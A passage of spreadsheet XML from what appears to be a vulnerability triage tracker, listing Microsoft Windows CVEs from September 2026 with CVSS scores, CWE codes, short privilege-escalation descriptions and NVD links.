      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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5" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S485" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69277</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S486" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69277</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69283</t>
        </is>
      </c>
      <c r="D487" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F487" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q487" s="5" t="inlineStr"/>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S487" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69283</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69284</t>
        </is>
      </c>
      <c r="D488" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F488" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q488" s="5" t="inlineStr"/>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S488" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DCOM Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69284</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69289</t>
        </is>
      </c>
      <c r="D489" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F489" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S489" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Setup Files Cleanup allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69289</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69290</t>
        </is>
      </c>
      <c r="D490" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F490" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S490" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69290</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69293</t>
        </is>
      </c>
      <c r="D491" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F491" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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91" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S491" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69295</t>
        </is>
      </c>
      <c r="D492" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F492" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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92" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="S492" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69298</t>
        </is>
      </c>
      <c r="D493" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F493" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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93" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S493" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69307</t>
        </is>
      </c>
      <c r="D494" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F494" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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94" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S494" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69312</t>
        </is>
      </c>
      <c r="D495" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F495" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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95" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S495" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69323</t>
        </is>
      </c>
      <c r="D496" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F496" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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96" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S496" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69324</t>
        </is>
      </c>
      <c r="D497" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F497" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="S497" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows Performance Monitor allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69324</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69328</t>
        </is>
      </c>
      <c r="D498" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F498" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S498" s="5" t="inlineStr">
        <is>
          <t>Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69328</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69348</t>
        </is>
      </c>
      <c r="D499" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F499" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S499" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69348</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69352</t>
        </is>
      </c>
      <c r="D500" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F500" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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00" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S500" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69359</t>
        </is>
      </c>
      <c r="D501" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F501" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S501" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Active Directory Domain Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69359</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69368</t>
        </is>
      </c>
      <c r="D502" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F502" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q502" s="5" t="inlineStr"/>
      <c r="R502" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S502" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69368</t>
        </is>
      </c>
    </row>
    <row r="503">
